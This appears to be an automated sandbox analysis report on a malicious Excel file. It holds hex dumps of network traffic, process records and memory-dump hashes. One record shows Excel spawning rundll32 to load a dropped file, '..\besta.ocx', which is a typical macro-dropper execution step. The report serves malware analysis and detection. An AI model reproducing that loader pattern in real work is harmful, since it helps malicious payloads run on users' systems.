                Dec 2, 2021 07:05:45.140254974 CET6INData Raw: 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20
                Data Ascii: eft; word-break: break-all; width: 100%; } .status-reason { font-size: 200%; display: block; color: #CCCCCC; } .reason-text { margin: 20px
                Dec 2, 2021 07:05:45.140295982 CET7INData Raw: 2f 2f 2f 2f 2f 35 2b 66 6e 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 36 2b 76 72 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                Data Ascii: /////5+fn////////////////////////////////6+vr///////////////////////////////////////+i5edTAAAAPXRSTlMAAQECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygoKSorLC0uLzAwMTIzNDU2Nzg5H7x0XAAACndJREFUeAHtXXlzGs8R7TQ3CFkHxpKxhIwtIBwgIuYY4u//uVJ2q
                Dec 2, 2021 07:05:45.140335083 CET8INData Raw: 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48 43 6d 30 71 45 76 45 5a 39 43 37 76 44 59 5a 65 57 41 51 68 6e 4b 6b 51 55 47 2f
                Data Ascii: qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7P9NwZ7CgAeDjlaM9ktAD0+Mxwrs
                Dec 2, 2021 07:05:45.140374899 CET10INData Raw: 32 6d 42 4e 36 49 32 35 6e 32 43 54 42 4f 4f 52 45 30 2f 36 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52
                Data Ascii: 2mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL
                Dec 2, 2021 07:05:45.140413046 CET11INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 30 25 3b 0a 20 20 20 20 20 20 20
                Data Ascii: } .reason-text { font-size: 160%; } } </style> </head> <body> <div class="container"> <span class="status-reason"> <i class="fas fa-us
                Dec 2, 2021 07:05:45.140993118 CET11INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:07:02:11
                Start date:02/12/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13fe60000
                File size:28253536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:07:06:36
                Start date:02/12/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.2932256944
                Imagebase:0xdf0000
                File size:44544 bytes
                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >

                  Executed Functions

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.1222041907.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 61e4701e1db813a74710f00c166fb6828cf091817b4e152551e78ac69e4f1649
                  • Instruction ID: 4a6d731ff892494a79e0092aec2d27391c9deb4b8f0304ec6ec411ebc5deb4a5
                  • Opcode Fuzzy Hash: 61e4701e1db813a74710f00c166fb6828cf091817b4e152551e78ac69e4f1649
                  • Instruction Fuzzy Hash: 1372755154E3D11FD70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1222041907.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 92c67b98172aaf09d97acac3003b8f56650b37e64dfd34b24bbb2bc717cb1fff
                  • Instruction ID: 2cd9e040b4b896fc79e5c3445ad0ce21128150c753ed7752159f57edb4638b94
                  • Opcode Fuzzy Hash: 92c67b98172aaf09d97acac3003b8f56650b37e64dfd34b24bbb2bc717cb1fff
                  • Instruction Fuzzy Hash: 1C72755154E3D11FD70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1222041907.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 91fe1c6b53f173ab64f5bbc35f070908a31b55222d4c5459130d05acabb062ba
                  • Instruction ID: 73d6de7fe657d07b4b2a938f3fbf0232b45fe50240389aefbf7feef540c2d483
                  • Opcode Fuzzy Hash: 91fe1c6b53f173ab64f5bbc35f070908a31b55222d4c5459130d05acabb062ba
                  • Instruction Fuzzy Hash: FD72755154E3D11FD70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1222041907.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 75bd88fe6342be8253f8ece9fded87b1c5379ed98d7c42caf139a84b0615abc2
                  • Instruction ID: 3de5c1b1ed2ed95a0600b5cef47e2d93323a22748b7512ab01e2c153964ff495
                  • Opcode Fuzzy Hash: 75bd88fe6342be8253f8ece9fded87b1c5379ed98d7c42caf139a84b0615abc2
                  • Instruction Fuzzy Hash: A172765154E3D11FC70787380DB96A6BF71AE13118B2E91DBC6C2DB8E3E608492AC763
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.1222041907.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 55f7aa5e46d1b3910a7f506b712b20c7d8822a6ccf25430664cb8e1d937aca64
                  • Instruction ID: c3db994f9130144ef02606a4a154b3b334772fd66d16f34f85851b083bfc5e97
                  • Opcode Fuzzy Hash: 55f7aa5e46d1b3910a7f506b712b20c7d8822a6ccf25430664cb8e1d937aca64
                  • Instruction Fuzzy Hash: 17C1415544E3D20FE71383381EB91927FB19E97158B2F15CBC2C2DB4A3EA18096AD723
                  Uniqueness

                  Uniqueness Score: -1.00%